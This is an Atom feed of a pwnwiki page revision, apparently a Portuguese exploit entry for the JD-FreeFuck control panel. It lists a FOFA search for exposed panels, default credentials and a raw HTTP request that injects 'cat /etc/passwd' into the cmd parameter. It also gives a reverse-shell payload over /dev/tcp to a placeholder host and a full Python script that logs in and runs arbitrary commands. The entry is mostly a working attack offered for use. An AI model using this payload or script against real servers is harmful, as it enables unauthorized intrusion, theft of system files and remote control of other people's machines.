<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="chinese">
	<id>https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=JD-FreeFuck_%E5%BE%8C%E5%8F%B0%E5%91%BD%E4%BB%A4%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E%2Fpt</id>
	<title>JD-FreeFuck 後台命令執行漏洞/pt - Revision history</title>
	<link rel="self" type="application/atom+xml" href="https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=JD-FreeFuck_%E5%BE%8C%E5%8F%B0%E5%91%BD%E4%BB%A4%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E%2Fpt"/>
	<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=JD-FreeFuck_%E5%BE%8C%E5%8F%B0%E5%91%BD%E4%BB%A4%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E/pt&amp;action=history"/>
	<updated>2026-04-06T21:34:57Z</updated>
	<subtitle>Revision history for this page on the wiki</subtitle>
	<generator>MediaWiki 1.35.1</generator>
	<entry>
		<id>https://pwnwiki.com/index.php?title=JD-FreeFuck_%E5%BE%8C%E5%8F%B0%E5%91%BD%E4%BB%A4%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E/pt&amp;diff=4676&amp;oldid=prev</id>
		<title>Pwnwiki: Created page with &quot;== Senha de conta padrão ==&quot;</title>
		<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=JD-FreeFuck_%E5%BE%8C%E5%8F%B0%E5%91%BD%E4%BB%A4%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E/pt&amp;diff=4676&amp;oldid=prev"/>
		<updated>2021-06-10T03:10:51Z</updated>

		<summary type="html">&lt;p&gt;Created page with &amp;quot;== Senha de conta padrão ==&amp;quot;&lt;/p&gt;
&lt;p&gt;&lt;b&gt;New page&lt;/b&gt;&lt;/p&gt;&lt;div&gt;&amp;lt;languages  /&amp;gt;&lt;br /&gt;
==FOFA==&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
title=&amp;quot;京东薅羊毛控制面板&amp;quot;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
== Senha de conta padrão ==&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
useradmin/supermanito&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
== Exploit ==&lt;br /&gt;
Envie o seguinte pacote de solicitação para executar o comando:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
POST /runCmd HTTP/1.1&lt;br /&gt;
Host: XXX.XXX.XXX.XXX:5678&lt;br /&gt;
Content-Length: 50&lt;br /&gt;
Pragma: no-cache&lt;br /&gt;
Cache-Control: no-cache&lt;br /&gt;
Accept: */*&lt;br /&gt;
X-Requested-With: XMLHttpRequest&lt;br /&gt;
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36&lt;br /&gt;
Content-Type: application/x-www-form-urlencoded; charset=UTF-8&lt;br /&gt;
Accept-Encoding: gzip, deflate&lt;br /&gt;
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-TW;q=0.6&lt;br /&gt;
Cookie: connect.0.6356777726800276=s%3Av1W6DxlSqnPpVgvMCItxElFeKI1Psh4i.eE4ORs0Yz30N0TOg1pUVpOqrpIHyrqIimuXJVO8lE7U&lt;br /&gt;
Connection: close&lt;br /&gt;
&lt;br /&gt;
cmd=bash+jd.sh+%3Bcat /etc/passwd%3B+now&amp;amp;delay=500&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
A injeção de comando existe para o parâmetro cmd.&lt;br /&gt;
==Getshell==&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
cmd=bash+jd.sh+%3Bbash+-c+'exec+bash+-i+%26%3E%2Fdev%2Ftcp%2Fxxx.xxx.xxx.xxx%2F9999+%3C%261'%3B+now&amp;amp;delay=500&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
==EXP==&lt;br /&gt;
====Usage:====&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
python3 exploit.py -u http://xx.xx.xx.xx:5678 -c &amp;quot;command&amp;quot;&lt;br /&gt;
&lt;br /&gt;
python3 exploit.py -u http://127.0.0.1:5678 -c &amp;quot;cat /etc/passwd&amp;quot;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
import requests&lt;br /&gt;
import json&lt;br /&gt;
import sys&lt;br /&gt;
import argparse&lt;br /&gt;
&lt;br /&gt;
def login(url,username=&amp;quot;useradmin&amp;quot;,password=&amp;quot;supermanito&amp;quot;):&lt;br /&gt;
    loginReq = requests.Session()&lt;br /&gt;
    payload = {&lt;br /&gt;
            &amp;quot;username&amp;quot;:username,&lt;br /&gt;
            &amp;quot;password&amp;quot;:password&lt;br /&gt;
            }&lt;br /&gt;
    headers1 = {&lt;br /&gt;
        &amp;quot;Accept&amp;quot;: &amp;quot;*/*&amp;quot;,&lt;br /&gt;
        &amp;quot;User-Agent&amp;quot;:&amp;quot;Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36&amp;quot;,&lt;br /&gt;
        &amp;quot;Content-Type&amp;quot;:&amp;quot;application/x-www-form-urlencoded; charset=UTF-8&amp;quot;,&lt;br /&gt;
        &amp;quot;Accept-Encoding&amp;quot;: &amp;quot;gzip, deflate&amp;quot;,&lt;br /&gt;
        &amp;quot;Accept-Language&amp;quot;: &amp;quot;zh-CN,zh;q=0.9&amp;quot;&lt;br /&gt;
    }&lt;br /&gt;
&lt;br /&gt;
    headers = {&lt;br /&gt;
        &amp;quot;Accept&amp;quot;: &amp;quot;*/*&amp;quot;,&lt;br /&gt;
        &amp;quot;X-Requested-With&amp;quot;: &amp;quot;XMLHttpRequest&amp;quot;,&lt;br /&gt;
        &amp;quot;User-Agent&amp;quot;:&amp;quot;Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36&amp;quot;,&lt;br /&gt;
        &amp;quot;Content-Type&amp;quot;:&amp;quot;application/x-www-form-urlencoded; charset=UTF-8&amp;quot;,&lt;br /&gt;
        &amp;quot;Origin&amp;quot;: url,&lt;br /&gt;
        &amp;quot;Referer&amp;quot;: url,&lt;br /&gt;
        &amp;quot;Accept-Encoding&amp;quot;: &amp;quot;gzip, deflate&amp;quot;,&lt;br /&gt;
        &amp;quot;Accept-Language&amp;quot;: &amp;quot;zh-CN,zh;q=0.9&amp;quot;&lt;br /&gt;
    }&lt;br /&gt;
&lt;br /&gt;
    loginReq.get(url, headers=headers1)&lt;br /&gt;
    content = loginReq.post(url + &amp;quot;auth&amp;quot;,data=payload,headers=headers)&lt;br /&gt;
    response = json.loads(content.text)&lt;br /&gt;
    # print(response[&amp;quot;err&amp;quot;])&lt;br /&gt;
    # print(loginReq.cookies)&lt;br /&gt;
    if response[&amp;quot;err&amp;quot;] == 0:&lt;br /&gt;
        print(&amp;quot;login success&amp;quot;)&lt;br /&gt;
        return(loginReq)&lt;br /&gt;
    else:&lt;br /&gt;
        print(&amp;quot;login failure&amp;quot;)&lt;br /&gt;
        raise RuntimeError(&amp;quot;Can't login,beacuse -&amp;gt; &amp;quot;+response[&amp;quot;msg&amp;quot;])&lt;br /&gt;
&lt;br /&gt;
def exploit(url,session,command):&lt;br /&gt;
    ''' POST form looks like&lt;br /&gt;
    POST /runCmd HTTP/1.1&lt;br /&gt;
    Host: XXX.XXX.XXX.XXXX:5678&lt;br /&gt;
    Content-Length: 51&lt;br /&gt;
    Accept: */*&lt;br /&gt;
    X-Requested-With: XMLHttpRequest&lt;br /&gt;
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36&lt;br /&gt;
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8&lt;br /&gt;
    Accept-Encoding: gzip, deflate&lt;br /&gt;
    Accept-Language: zh-CN,zh;q=0.9&lt;br /&gt;
    Cookie: connect.0.3349226518321824=s%3AWfJDGLRc0_vdAuXSWDOYku1qMSLXcZjv.vr52DLelVmWNvsY2q7SQCH%2B8KmDzT0ds2eRw7Fay0Sc&lt;br /&gt;
    Connection: close&lt;br /&gt;
&lt;br /&gt;
    cmd=bash+jd.sh+bean_change%3Bifconfig%3B&amp;amp;delay=1000&lt;br /&gt;
    '''&lt;br /&gt;
    headers = {&lt;br /&gt;
        &amp;quot;Accept&amp;quot;: &amp;quot;*/*&amp;quot;,&lt;br /&gt;
        &amp;quot;X-Requested-With&amp;quot;: &amp;quot;XMLHttpRequest&amp;quot;,&lt;br /&gt;
        &amp;quot;User-Agent&amp;quot;:&amp;quot;Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36&amp;quot;,&lt;br /&gt;
        &amp;quot;Content-Type&amp;quot;:&amp;quot;application/x-www-form-urlencoded; charset=UTF-8&amp;quot;,&lt;br /&gt;
        &amp;quot;Accept-Encoding&amp;quot;: &amp;quot;gzip, deflate&amp;quot;,&lt;br /&gt;
        &amp;quot;Accept-Language&amp;quot;: &amp;quot;zh-CN,zh;q=0.9&amp;quot;,&lt;br /&gt;
        &amp;quot;Connection&amp;quot;: &amp;quot;close&amp;quot;&lt;br /&gt;
    }&lt;br /&gt;
    datas = {&lt;br /&gt;
        &amp;quot;cmd&amp;quot;:&amp;quot;bash+jd.sh+bean_change;&amp;quot;+command+&amp;quot;;&amp;quot;,&lt;br /&gt;
        &amp;quot;delay&amp;quot;:&amp;quot;1000&amp;quot;&lt;br /&gt;
    }&lt;br /&gt;
    response = session.post(url+&amp;quot;runCmd&amp;quot;,data=datas,headers=headers)&lt;br /&gt;
    # print(session.cookies)&lt;br /&gt;
    objectResponse = json.loads(response.text)&lt;br /&gt;
    # print(objectResponse)&lt;br /&gt;
    if objectResponse[&amp;quot;err&amp;quot;] == 0:&lt;br /&gt;
        print(&amp;quot;execute success&amp;quot;,&amp;quot;\n&amp;quot;)&lt;br /&gt;
        print(objectResponse)&lt;br /&gt;
        print(&amp;quot;$ &amp;quot;+command)&lt;br /&gt;
        for line in objectResponse[&amp;quot;msg&amp;quot;].split(&amp;quot;\n&amp;quot;):&lt;br /&gt;
            print(line)&lt;br /&gt;
    else:&lt;br /&gt;
        print(&amp;quot;execute failure&amp;quot;)&lt;br /&gt;
        raise RuntimeError(&amp;quot;Can't execute --&amp;gt; &amp;quot;+objectResponse[&amp;quot;msg&amp;quot;])&lt;br /&gt;
&lt;br /&gt;
if __name__ == &amp;quot;__main__&amp;quot; :&lt;br /&gt;
    parser = argparse.ArgumentParser(description='this is the EXP of JD fuck')&lt;br /&gt;
    parser.add_argument(&amp;quot;-u&amp;quot;,metavar=&amp;quot;url&amp;quot;,type=str,help=&amp;quot;url there, e.g: http://127.0.0.1:5678/&amp;quot;)&lt;br /&gt;
    parser.add_argument(&amp;quot;-c&amp;quot;,metavar=&amp;quot;command&amp;quot;,type=str,help=&amp;quot;execute command, e.g: ls&amp;quot;)&lt;br /&gt;
    # print(sys.argv[1:])&lt;br /&gt;
    args = vars( parser.parse_args(sys.argv[1:]) )&lt;br /&gt;
    url = args[&amp;quot;u&amp;quot;]&lt;br /&gt;
    command = args[&amp;quot;c&amp;quot;]&lt;br /&gt;
    exploit(url,login(url),command)&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Referência == &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
https://www.secquan.org/Discuss/1071932#reply3&lt;br /&gt;
&lt;br /&gt;
https://mp.weixin.qq.com/s/MEcuSnroUh6z3wp9Mi_OkA&lt;br /&gt;
&lt;br /&gt;
https://github.com/Esonhugh/JD-Freefuckfucker&lt;/div&gt;</summary>
		<author><name>Pwnwiki</name></author>
	</entry>
</feed>